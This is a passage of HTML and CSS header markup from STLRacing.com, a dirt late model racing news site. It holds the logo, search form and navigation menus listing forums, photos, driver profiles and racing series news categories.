	<li id="menu-item-31286" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31286"><a href="https://www.stlracing.com/facebook-feeds/tracks-facebook-feed/">Tracks Facebook Feeds</a></li>
	<li id="menu-item-31281" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31281"><a href="https://www.stlracing.com/facebook-feeds/series-facebook-feeds/">Series Facebook Feeds</a></li>
</ul>
</li>
<li id="menu-item-30146" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30146"><a href="https://www.stlracing.com/community/index.php?forums/classified-ads.110/">Classifieds</a></li>
<li id="menu-item-30147" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30147"><a href="https://www.stlracing.com/advertise.html">Advertise</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
    </div>    <div class="td-search-background" style="visibility:hidden"></div>
<div class="td-search-wrap-mob" style="visibility:hidden">
	<div class="td-drop-down-search">
		<form method="get" class="td-search-form" action="https://www.stlracing.com/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob" class="td-ajax-search-flex"></div>
	</div>
</div>

    <div id="td-outer-wrap" class="td-theme-wrap">
    
                    <div class="td-header-template-wrap" style="position: relative">
                                    <div class="td-header-mobile-wrap ">
                        <div id="tdi_1" class="tdc-zone"><div class="tdc_zone tdi_2  wpb_row td-pb-row"  >
<style scoped>

/* custom css */
.tdi_2{
                    min-height: 0;
                }
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_2{
margin-bottom:55px !important;
padding-top:5px !important;
padding-bottom:5px !important;
}
}

</style><div id="tdi_3" class="tdc-row"><div class="vc_row tdi_4  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_4,
                .tdi_4 .tdc-columns{
                    min-height: 0;
                }.tdi_4,
				.tdi_4 .tdc-columns{
				    display: block;
				}.tdi_4 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_6  wpb_column vc_column_container tdc-column td-pb-span3">
<style scoped>

/* custom css */
.tdi_6{
                    vertical-align: baseline;
                }.tdi_6 > .wpb_wrapper,
				.tdi_6 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_6 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_6 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_6 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}

/* phone */
@media (max-width: 767px){
.tdi_6{
                    vertical-align: middle;
                }
}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_6{
width:22% !important;
display:inline-block !important;
}
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo tdi_7 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_7" >
<style>
/* custom css */
.tdb-header-align{
                  vertical-align: middle;
                }.tdb_header_logo{
                  margin-bottom: 0;
                  clear: none;
                }.tdb_header_logo .tdb-logo-a,
                .tdb_header_logo h1{
                  display: flex;
                  pointer-events: auto;
                  align-items: flex-start;
                }.tdb_header_logo h1{
                  margin: 0;
                  line-height: 0;
                }.tdb_header_logo .tdb-logo-img-wrap img{
                  display: block;
                }.tdb_header_logo .tdb-logo-svg-wrap + .tdb-logo-img-wrap{
                  display: none;
                }.tdb_header_logo .tdb-logo-svg-wrap svg{
                  width: 50px;
                  display: block;
                  transition: fill .3s ease;
                }.tdb_header_logo .tdb-logo-text-wrap{
                  display: flex;
                }.tdb_header_logo .tdb-logo-text-title,
                .tdb_header_logo .tdb-logo-text-tagline{
                  -webkit-transition: all 0.2s ease;
                  transition: all 0.2s ease;
                }.tdb_header_logo .tdb-logo-text-title{
                  background-size: cover;
                  background-position: center center;
                  font-size: 75px;
                  font-family: serif;
                  line-height: 1.1;
                  color: #222;
                  white-space: nowrap;
                }.tdb_header_logo .tdb-logo-text-tagline{
                  margin-top: 2px;
                  font-size: 12px;
                  font-family: serif;
                  letter-spacing: 1.8px;
                  line-height: 1;
                  color: #767676;
                }.tdb_header_logo .tdb-logo-icon{
                  position: relative;
                  font-size: 46px;
                  color: #000;
                }.tdb_header_logo .tdb-logo-icon-svg{
                  line-height: 0;
                }.tdb_header_logo .tdb-logo-icon-svg svg{
                  width: 46px;
                  height: auto;
                }.tdb_header_logo .tdb-logo-icon-svg svg,
                .tdb_header_logo .tdb-logo-icon-svg svg *{
                  fill: #000;
                }.tdi_7 .tdb-logo-a,
                .tdi_7 h1{
                    flex-direction: row;
                
                    align-items: center;
                
                    justify-content: flex-start;
                }.tdi_7 .tdb-logo-svg-wrap{
                    display: block;
                }.tdi_7 .tdb-logo-svg-wrap + .tdb-logo-img-wrap{
                    display: none;
                }.tdi_7 .tdb-logo-img-wrap{
                    display: block;
                }.tdi_7 .tdb-logo-text-tagline{
                    margin-top: 0px;
                    margin-left: 0;
                
                    display: block;
                
                     background-color: rgba(255,252,252,0.6);
					-webkit-background-clip: text;
					-webkit-text-fill-color: transparent;
                
                    font-family:Heebo !important;letter-spacing:0px !important;;
                }.tdi_7 .tdb-logo-text-title{
                    display: block;
                
                    color: #ffffff;
                
                    font-family:Heebo !important;font-weight:500 !important;;
                }.tdi_7 .tdb-logo-text-wrap{
                    flex-direction: column;
                
                    align-items: flex-start;
                }.tdi_7 .tdb-logo-icon{
                    top: 0px;
                
                    display: block;
                }html[class*='ie'] .tdi_7 .tdb-logo-text-tagline{
				    background: none;
					color: rgba(255,252,252,0.6);
				}@media (max-width: 767px) {
                  .tdb_header_logo .tdb-logo-text-title {
                    font-size: 36px;
                  }
                }@media (max-width: 767px) {
                  .tdb_header_logo .tdb-logo-text-tagline {
                    font-size: 11px;
                  }
                }

/* phone */
@media (max-width: 767px){
.tdi_7 .tdb-logo-text-title{
                    font-family:Heebo !important;font-size:24px !important;font-weight:500 !important;;
                }.tdi_7 .tdb-logo-text-tagline{
                    font-family:Heebo !important;font-size:10px !important;letter-spacing:0px !important;;
                }
}
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.stlracing.com/"><span class="tdb-logo-img-wrap"><img class="tdb-logo-img" src="https://www.stlracing.com/wp-content/uploads/2018/12/STLRACING-LOGO-FINAL2-300x138.png" alt="Logo"  title=""  /></span><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">Black</span><span class="tdb-logo-text-tagline">version PRO</span></span></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_9  wpb_column vc_column_container tdc-column td-pb-span9">
<style scoped>

/* custom css */
.tdi_9{
                    vertical-align: baseline;
                }.tdi_9 > .wpb_wrapper,
				.tdi_9 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_9 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_9 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_9 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}

/* phone */
@media (max-width: 767px){
.tdi_9{
                    vertical-align: middle;
                }
}
/* inline tdc_css att */

/* phone */
@media (max-width: 767px)
{
.tdi_9{
padding-left:14px !important;
width:78% !important;
display:inline-block !important;
}
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_mobile_horiz_menu tdi_10 tdb-horiz-menu-singleline td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_10"  style=" z-index: 999;">
<style>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</style><div id=tdi_10 class="td_block_inner td-fix-index"><div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="tdb-horiz-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-30125"><a href="https://www.stlracing.com"><div class="tdb-menu-item-text">HOME</div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30128"><a href="https://www.stlracing.com/community"><div class="tdb-menu-item-text">Forums</div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30133 tdb-menu-item-inactive"><a href="https://www.stlracingphotos.com"><div class="tdb-menu-item-text">Photos</div></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30135"><a href="https://www.stlracingphotos.com"><div class="tdb-menu-item-text">STLRacingPhotos.com Photos</div></a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30136"><a href="https://www.stlracingphotos.com/Federated-Auto-Parts-Raceway"><div class="tdb-menu-item-text">I-55 Raceway Photos</div></a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30134"><a href="https://www.stlracing.com/gallery"><div class="tdb-menu-item-text">Old User Photos</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-30137 tdb-menu-item-inactive"><a href="https://www.stlracing.com/directory"><div class="tdb-menu-item-text">Racing Links</div></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30138"><a href="https://www.stlracing.com/directory/links_category/drivers-race-teams/"><div class="tdb-menu-item-text">Drivers Websites</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-wpbdp_category menu-item-30139"><a href="https://www.stlracing.com/directory/links_category/racing-sanctioning-organizations/"><div class="tdb-menu-item-text">Sanctioning Bodies</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30145"><a href="http://www.stlracing.com/events/"><div class="tdb-menu-item-text">Events</div></a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-36284 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/driver-profiles/"><div class="tdb-menu-item-text">Driver Profiles</div></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-36348"><a href="https://www.stlracing.com/submit-driver-profile/"><div class="tdb-menu-item-text">Submit Driver Profile</div></a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-36285"><a href="https://www.stlracing.com/category/driver-profiles/2016-driver-profiles/"><div class="tdb-menu-item-text">2016 Driver Profiles</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31280 tdb-menu-item-inactive"><a href="https://www.stlracing.com/facebook-feeds/"><div class="tdb-menu-item-text">Facebook Feeds</div></a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31286"><a href="https://www.stlracing.com/facebook-feeds/tracks-facebook-feed/"><div class="tdb-menu-item-text">Tracks Facebook Feeds</div></a></li>
	<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31281"><a href="https://www.stlracing.com/facebook-feeds/series-facebook-feeds/"><div class="tdb-menu-item-text">Series Facebook Feeds</div></a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30146"><a href="https://www.stlracing.com/community/index.php?forums/classified-ads.110/"><div class="tdb-menu-item-text">Classifieds</div></a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-30147"><a href="https://www.stlracing.com/advertise.html"><div class="tdb-menu-item-text">Advertise</div></a></li>
</ul></div></div></div></div></div></div></div><div id="tdi_11" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_12  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_12,
                .tdi_12 .tdc-columns{
                    min-height: 0;
                }.tdi_12,
				.tdi_12 .tdc-columns{
				    display: block;
				}.tdi_12 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_14  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_14{
                    vertical-align: baseline;
                }.tdi_14 > .wpb_wrapper,
				.tdi_14 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_14 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_14 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_14 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_16  td_separator_solid td_separator_center"><span style="border-color:rgba(255,252,252,0.12);border-width:1px;width:100%;"></span>
<style scoped>

/* custom css */
.td_block_separator{
                  width: 100%;
                  align-items: center;
                  margin-bottom: 38px;
                  padding-bottom: 10px;
                }.td_block_separator span{
                  position: relative;
                  display: block;
                  margin: 0 auto;
                  width: 100%;
                  height: 1px;
                  border-top: 1px solid #EBEBEB;
                }.td_separator_align_left span{
                  margin-left: 0;
                }.td_separator_align_right span{
                  margin-right: 0;
                }.td_separator_dashed span{
                  border-top-style: dashed;
                }.td_separator_dotted span{
                  border-top-style: dotted;
                }.td_separator_double span{
                  height: 3px;
                  border-bottom: 1px solid #EBEBEB;
                }.td_separator_shadow > span{
                  position: relative;
                  height: 20px;
                  overflow: hidden;
                  border: 0;
                  color: #EBEBEB;
                }.td_separator_shadow > span > span{
                  position: absolute;
                  top: -30px;
                  left: 0;
                  right: 0;
                  margin: 0 auto;
                  height: 13px;
                  width: 98%;
                  border-radius: 100%;
                }html :where([style*='border-width']){
                    border-style: none;
                }
/* inline tdc_css att */

.tdi_16{
margin-bottom:0px !important;
}

</style></div></div></div></div></div></div></div>                    </div>
                                    <div class="td-header-mobile-sticky-wrap tdc-zone-sticky-invisible tdc-zone-sticky-inactive" style="display: none">
                        <div id="tdi_17" class="tdc-zone"><div class="tdc_zone tdi_18  wpb_row td-pb-row" data-sticky-offset="0" >
<style scoped>

/* custom css */
.tdi_18{
                    min-height: 0;
                }.td-header-mobile-sticky-wrap.td-header-active{
                    opacity: 1;
                }
</style><div id="tdi_19" class="tdc-row"><div class="vc_row tdi_20  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_20,
                .tdi_20 .tdc-columns{
                    min-height: 0;
                }.tdi_20,
				.tdi_20 .tdc-columns{
				    display: block;
				}.tdi_20 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_22  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_22{
                    vertical-align: baseline;
                }.tdi_22 > .wpb_wrapper,
				.tdi_22 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_22 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_22 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_22 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"></div></div></div></div></div></div>                    </div>
                
                    <div class="td-header-desktop-wrap ">
                        <div id="tdi_23" class="tdc-zone"><div class="tdc_zone tdi_24  wpb_row td-pb-row"  >
<style scoped>

/* custom css */
.tdi_24{
                    min-height: 0;
                }.td-header-desktop-wrap{
                    position: relative;
                }
/* inline tdc_css att */

.tdi_24{
margin-bottom:70px !important;
}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px)
{
.tdi_24{
margin-bottom:50px !important;
}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_24{
margin-bottom:40px !important;
}
}

</style><div id="tdi_25" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_26  wpb_row td-pb-row tdc-row-content-vert-center" >
<style scoped>

/* custom css */
.tdi_26,
                .tdi_26 .tdc-columns{
                    min-height: 0;
                }.tdi_26,
				.tdi_26 .tdc-columns{
				    display: block;
				}.tdi_26 .tdc-columns{
				    width: 100%;
				}@media (min-width: 768px) {
	                .tdi_26 {
	                    margin-left: -10px;
	                    margin-right: -10px;
	                }
	                .tdi_26 .tdc-row-video-background-error,
	                .tdi_26 .vc_column {
	                    padding-left: 10px;
	                    padding-right: 10px;
	                }
                }@media (min-width: 767px) {
                    .tdi_26.tdc-row-content-vert-center,
                    .tdi_26.tdc-row-content-vert-center .tdc-columns {
                        display: flex;
                        align-items: center;
                        flex: 1;
                    }
                    .tdi_26.tdc-row-content-vert-bottom,
                    .tdi_26.tdc-row-content-vert-bottom .tdc-columns {
                        display: flex;
                        align-items: flex-end;
                        flex: 1;
                    }
                    .tdi_26.tdc-row-content-vert-center .td_block_wrap {
                        vertical-align: middle;
                    }
                    .tdi_26.tdc-row-content-vert-bottom .td_block_wrap {
                        vertical-align: bottom;
                    }
                }
/* inline tdc_css att */

/* portrait */
@media (min-width: 768px) and (max-width: 1018px)
{
.tdi_26{
padding-right:10px !important;
padding-left:10px !important;
}
}

</style><div class="vc_column tdi_28  wpb_column vc_column_container tdc-column td-pb-span3">
<style scoped>

/* custom css */
.tdi_28{
                    vertical-align: baseline;
                }.tdi_28 > .wpb_wrapper,
				.tdi_28 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_28 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_28 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_28 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
/* inline tdc_css att */

.tdi_28{
width:20% !important;
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_logo tdi_29 td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_29" >
<style>
/* custom css */
.tdi_29 .tdb-logo-a,
                .tdi_29 h1{
                    flex-direction: row;
                
                    align-items: center;
                
                    justify-content: flex-start;
                }.tdi_29 .tdb-logo-svg-wrap{
                    display: block;
                }.tdi_29 .tdb-logo-svg-wrap + .tdb-logo-img-wrap{
                    display: none;
                }.tdi_29 .tdb-logo-img-wrap{
                    display: block;
                }.tdi_29 .tdb-logo-text-tagline{
                    margin-top: 0px;
                    margin-left: 0;
                
                    display: none;
                
                     background-color: rgba(255,252,252,0.6);
					-webkit-background-clip: text;
					-webkit-text-fill-color: transparent;
                
                    font-family:Heebo !important;letter-spacing:0px !important;;
                }.tdi_29 .tdb-logo-text-title{
                    display: none;
                
                    color: #ffffff;
                
                    font-family:Heebo !important;font-size:28px !important;font-weight:500 !important;;
                }.tdi_29 .tdb-logo-text-wrap{
                    flex-direction: column;
                
                    align-items: flex-start;
                }.tdi_29 .tdb-logo-icon{
                    top: 0px;
                
                    display: block;
                }html[class*='ie'] .tdi_29 .tdb-logo-text-tagline{
				    background: none;
					color: rgba(255,252,252,0.6);
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_29 .tdb-logo-text-title{
                    font-family:Heebo !important;font-size:26px !important;font-weight:500 !important;;
                }.tdi_29 .tdb-logo-text-tagline{
                    font-family:Heebo !important;font-size:12px !important;letter-spacing:0px !important;;
                }
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_29 .tdb-logo-text-title{
                    font-family:Heebo !important;font-size:26px !important;font-weight:500 !important;;
                }.tdi_29 .tdb-logo-text-tagline{
                    font-family:Heebo !important;font-size:12px !important;letter-spacing:0px !important;;
                }
}
</style><div class="tdb-block-inner td-fix-index"><a class="tdb-logo-a" href="https://www.stlracing.com/"><span class="tdb-logo-img-wrap"><img class="tdb-logo-img" src="https://www.stlracing.com/wp-content/uploads/2018/12/STLRACING-LOGO-FINAL2-300x138.png" alt="Logo"  title=""  /></span><span class="tdb-logo-text-wrap"><span class="tdb-logo-text-title">STLRacing</span><span class="tdb-logo-text-tagline">Racing news, results & information from around the country!</span></span></a></div></div> <!-- ./block --></div></div><div class="vc_column tdi_31  wpb_column vc_column_container tdc-column td-pb-span6">
<style scoped>

/* custom css */
.tdi_31{
                    vertical-align: baseline;
                }.tdi_31 > .wpb_wrapper,
				.tdi_31 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_31 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_31 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_31 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
/* inline tdc_css att */

.tdi_31{
width:60% !important;
}

</style><div class="wpb_wrapper"><div class="td_block_wrap tdb_header_menu tdi_32 tds_menu_active1 tds_menu_sub_active1 tdb-menu-items-in-more td-pb-border-top td_block_template_1 tdb-header-align"  data-td-block-uid="tdi_32"  style=" z-index: 999;">
<style>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</style>
<style>
.tdi_32 .tdb-menu > li.current-menu-item > a,
				.tdi_32 .tdb-menu > li.current-menu-ancestor > a,
				.tdi_32 .tdb-menu > li.current-category-ancestor > a,
				.tdi_32 .tdb-menu > li:hover > a,
				.tdi_32 .tdb-menu > li.tdb-hover > a,
				.tdi_32 .tdb-menu-items-dropdown:hover .td-subcat-more{
					color: #ffa301;
				}.tdi_32 .tdb-menu > li.current-menu-item > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu > li.current-menu-item > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu > li.current-menu-ancestor > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu > li.current-menu-ancestor > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu > li.current-category-ancestor > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu > li.current-category-ancestor > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu > li:hover > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu > li:hover > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu > li.tdb-hover > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu > li.tdb-hover > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu-items-dropdown:hover .td-subcat-more .tdb-menu-more-icon-svg svg,
				.tdi_32 .tdb-menu-items-dropdown:hover .td-subcat-more .tdb-menu-more-icon-svg svg *{
					fill: #ffa301;
				}.tdi_32 .tdb-menu > li > a:after,
				.tdi_32 .tdb-menu-items-dropdown .td-subcat-more:after{
					background-color:     ;
				
					bottom: 0px;
				}.tdi_32 .tdb-menu > li.current-menu-item > a:after,
				.tdi_32 .tdb-menu > li.current-menu-ancestor > a:after,
				.tdi_32 .tdb-menu > li.current-category-ancestor > a:after,
				.tdi_32 .tdb-menu > li:hover > a:after,
				.tdi_32 .tdb-menu > li.tdb-hover > a:after,
				.tdi_32 .tdb-menu-items-dropdown:hover .td-subcat-more:after{
					width: 0px;
				}
</style>
<style>
.tdi_32 .tdb-menu ul .tdb-normal-menu.current-menu-item > a,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor > a,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-category-ancestor > a,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.tdb-hover > a,
				.tdi_32 .tdb-menu ul .tdb-normal-menu:hover > a,
				.tdi_32 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover > a{
					color: #ffa301;
				}.tdi_32 .tdb-menu ul .tdb-normal-menu.current-menu-item > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-menu-item > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-menu-ancestor > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-category-ancestor > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.current-category-ancestor > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.tdb-hover > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu ul .tdb-normal-menu.tdb-hover > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu ul .tdb-normal-menu:hover > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu ul .tdb-normal-menu:hover > a .tdb-sub-menu-icon-svg svg *,
				.tdi_32 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover > a .tdb-sub-menu-icon-svg svg,
				.tdi_32 .tdb-menu-items-dropdown .td-pulldown-filter-list li:hover > a .tdb-sub-menu-icon-svg svg *{
					fill: #ffa301;
				}
</style><div id=tdi_32 class="td_block_inner td-fix-index"><div class="tdb-main-sub-icon-fake"><i class="tdb-sub-menu-icon td-icon-pluss tdb-main-sub-menu-icon"></i></div><div class="tdb-sub-icon-fake"><i class="tdb-sub-menu-icon td-icon-pluss"></i></div><div class="tdb-menu-items-pulldown tdb-menu-items-pulldown-inactive"><ul id="menu-top-menu" class="tdb-block-menu tdb-menu tdb-menu-items-visible"><li id="menu-item-26" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-26"><a href="https://www.stlracing.com"><div class="tdb-menu-item-text">Home</div></a></li>
<li id="menu-item-52642" class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-52642"><a href="https://www.stlracing.com/community"><div class="tdb-menu-item-text">Forums</div></a></li>
<li id="menu-item-23249" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-23249 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/dirt-late-model-news"><div class="tdb-menu-item-text">Racing News</div><i class="tdb-sub-menu-icon td-icon-pluss tdb-main-sub-menu-icon"></i></a>
<ul class="sub-menu">
	<li id="menu-item-23243" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23243 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/dirt-late-model-news/"><div class="tdb-menu-item-text">Late Model News</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-23254" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23254"><a href="https://www.stlracing.com/category/dirt-late-model-news/comp-cams-super-dirt-car-series/"><div class="tdb-menu-item-text">Comp Cams Super Dirt Car Series</div></a></li>
		<li id="menu-item-23255" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23255"><a href="https://www.stlracing.com/category/dirt-late-model-news/corn-belt-clash-dirt-late-model-news/"><div class="tdb-menu-item-text">Corn Belt Clash</div></a></li>
		<li id="menu-item-23256" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23256"><a href="https://www.stlracing.com/category/dirt-late-model-news/crate-late-model-series-news/"><div class="tdb-menu-item-text">Crate Late Model Series News</div></a></li>
		<li id="menu-item-23308" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23308"><a href="https://www.stlracing.com/category/dirt-late-model-news/imca-late-model-series-news/"><div class="tdb-menu-item-text">IMCA Late Model Series News</div></a></li>
		<li id="menu-item-23246" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23246"><a href="https://www.stlracing.com/category/dirt-late-model-news/lucas-oil-late-model-series-news/"><div class="tdb-menu-item-text">Lucas Oil Late Model Series News</div></a></li>
		<li id="menu-item-23250" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23250"><a href="https://www.stlracing.com/category/dirt-late-model-news/mars-dirtcar-series-news/"><div class="tdb-menu-item-text">MARS DIRTcar Series News</div></a></li>
		<li id="menu-item-23251" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23251"><a href="https://www.stlracing.com/category/dirt-late-model-news/mlra-series-news/"><div class="tdb-menu-item-text">MLRA Series News</div></a></li>
		<li id="menu-item-23336" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23336"><a href="https://www.stlracing.com/category/dirt-late-model-news/ray-cooks-southern-nationals-series-news/"><div class="tdb-menu-item-text">Ray Cook&#8217;s Southern Nationals Series News</div></a></li>
		<li id="menu-item-23339" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23339"><a href="https://www.stlracing.com/category/dirt-late-model-news/ulma-series-news/"><div class="tdb-menu-item-text">ULMA Series News</div></a></li>
		<li id="menu-item-23337" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23337"><a href="https://www.stlracing.com/category/dirt-late-model-news/southern-regional-racing-series-dirt-late-model-news/"><div class="tdb-menu-item-text">Southern Regional Racing Series</div></a></li>
		<li id="menu-item-23338" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23338"><a href="https://www.stlracing.com/category/dirt-late-model-news/sunoco-american-late-model-series-alms/"><div class="tdb-menu-item-text">Sunoco American Late Model Series (ALMS)</div></a></li>
		<li id="menu-item-23244" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23244 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/dirt-late-model-news/u-m-p-dirtcar-series-news/"><div class="tdb-menu-item-text">U.M.P. DIRTcar Series Late Model News</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
		<ul class="sub-menu">
			<li id="menu-item-23346" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23346"><a href="https://www.stlracing.com/category/dirt-late-model-news/u-m-p-dirtcar-series-news/u-m-p-dirtcar-summer-nationals/"><div class="tdb-menu-item-text">U.M.P. DIRTcar Summer Nationals</div></a></li>
		</ul>
</li>
